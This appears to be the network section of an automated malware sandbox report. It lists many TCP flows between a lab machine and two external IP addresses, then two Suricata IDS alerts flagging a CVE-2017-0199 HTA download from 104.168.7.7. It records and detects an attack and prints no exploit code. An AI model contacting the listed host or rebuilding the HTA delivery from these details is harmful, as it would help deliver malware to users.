          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
          Source: global trafficTCP traffic: 104.21.78.54:443 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
          Source: global trafficTCP traffic: 104.21.78.54:443 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 104.21.78.54:443 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
          Source: global trafficTCP traffic: 104.21.78.54:443 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 104.21.78.54:443 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
          Source: global trafficTCP traffic: 104.21.78.54:443 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 104.21.78.54:443 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
          Source: global trafficTCP traffic: 104.21.78.54:443 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 104.21.78.54:443 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
          Source: global trafficTCP traffic: 104.21.78.54:443 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
          Source: global trafficTCP traffic: 104.168.7.7:80 -> 192.168.2.22:49169
          Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80

          Networking

          barindex
          Suricata IDS alerts for network traffic
          Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49168 -> 104.168.7.7:80
          Source: Network trafficSuricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 104.168.7.7:80 -> 192.168.2.22:49168
